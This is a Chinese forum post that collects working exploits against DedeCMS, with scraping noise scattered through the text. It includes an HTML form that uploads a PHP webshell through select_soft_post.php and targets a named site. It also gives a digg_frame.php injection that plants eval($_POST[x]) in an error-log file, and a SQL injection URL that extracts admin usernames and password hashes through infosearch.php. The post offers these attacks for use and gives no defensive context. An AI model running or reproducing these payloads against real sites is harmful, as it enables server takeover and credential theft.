. T, N0 ]' \! `/ U织梦(Dedecms)select_soft_post.php页面变量未初始漏洞/ j4 r* e; K& e; k; v
<html>+ l7 V( V: c( @8 K/ j( n
<head>
( F3 U* r8 H; S Y( l' j<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
9 p& ~6 W5 W6 c- K0 A</head>' ~- ]* L. {. U- ~( \- f
<body style="FONT-SIZE: 9pt">
2 w4 A: F" t+ D0 S/ G---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />4 \. p" T+ y' P |9 k
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
3 w% B: }; ]1 I3 B1 D! u% |<input type='hidden' name='activepath' value='/data/cache/' />
: c I! @1 w$ n$ ?8 V<input type='hidden' name='cfg_basedir' value='../../' />* }" V2 T6 O6 q: Y0 E1 R& s
<input type='hidden' name='cfg_imgtype' value='php' />
0 |9 n5 P* o0 \% \<input type='hidden' name='cfg_not_allowall' value='txt' />
: r9 A1 |; ~; [5 ?* h# H<input type='hidden' name='cfg_softtype' value='php' />. W. P( ?9 {5 n
<input type='hidden' name='cfg_mediatype' value='php' />
2 Z _8 k! _" D0 ]<input type='hidden' name='f' value='form1.enclosure' />
- {, F; C( P9 I5 N. v" W<input type='hidden' name='job' value='upload' /># r& M7 _% y A$ B. b, T
<input type='hidden' name='newname' value='fly.php' />4 t; ?% _1 q$ B
Select U Shell <input type='file' name='uploadfile' size='25' />
$ D( l' |$ |; R<input type='submit' name='sb1' value='确定' />
: L# Y& i# Z* N$ _9 Y</form>, ^( z$ ]/ ^% J1 k8 q9 h; ^
<br />It's just a exp for the bug of Dedecms V55...<br />
8 A# _5 J& Q9 l( Z( g+ a) tNeed register_globals = on...<br />
# |1 I* E2 x; H% T6 dFun the game,get a webshell at /data/cache/fly.php...<br />
3 N$ V' J. _6 D3 H, u</body>
/ F2 q& X: I$ D0 m' q</html>0 Q+ j5 D/ M4 z9 z- ~
, u3 b+ C5 L! n$ j
r7 n1 {# c) P/ v; l2 { G6 o6 A8 I, }1 O- E
! d# N; Q f: M& y, l+ H1 _. T6 d8 W% T, i& I- g! E J
O7 h; x3 L2 q# Z5 l5 F& u, M( k4 b5 U
. n! T5 \7 S' }# W+ l5 U
+ i! _& E. L$ a/ {/ ^& I1 n V
6 s% z1 T) A2 h4 c' H u织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞& G7 H2 Y) @% {6 d2 k. G" D& D
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
' a( ]# J- Y' ?8 F. f5 r1. 访问网址:; k) W8 i9 a" x4 F' I1 J; w
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
3 I3 Q/ y! J m9 h; } S& t可看见错误信息
2 g$ i, _8 m* @. i2 G
0 b; f) B/ z6 N9 e& V6 j) p( z$ ?( O2 M
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
$ W2 D4 m, i# p- m8 ^' s% I/ {int(3) Error: Illegal double '1024e1024' value found during parsing
[5 o* e$ j8 e; T9 \- E% @Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>( I# i" ]2 t( B
& |/ O. N" O) _7 C4 B- t. s0 w- A$ r, ]8 J! X/ o. e4 U" G
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
/ y; Q2 {1 H( U
) i* u) g( `+ O2 D
8 a) v1 b% N7 F9 g3 C<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>3 v# P1 B K8 ]+ e$ Z# O
7 ~/ e- j' c ~- Y8 q' R0 z6 }0 t8 e8 k' h& S
按确定后的看到第2步骤的信息表示文件木马上传成功.8 @+ L! i& O/ H9 j h2 K ?; Q
9 Y0 h7 g7 w* B0 Y, |" j: n! [
& @! n2 y# |: @& N# b( ]0 `- J: t; c7 ?
3 @6 v* U `2 f: \# w" b2 w
- E) m |; v% ^0 j* T* b6 E; [ M, S, l
+ {( b$ q4 w* e- k" s4 J
7 [& p2 E7 l. [
0 V. ~3 e. N+ j" X* L
4 H( H p q8 C% M& I8 [# w, `! T! R9 N ~* d1 A; x7 d
7 I+ l$ p0 p5 g/ p5 H9 |
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
9 F# Z3 o. @9 P/ |7 @http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对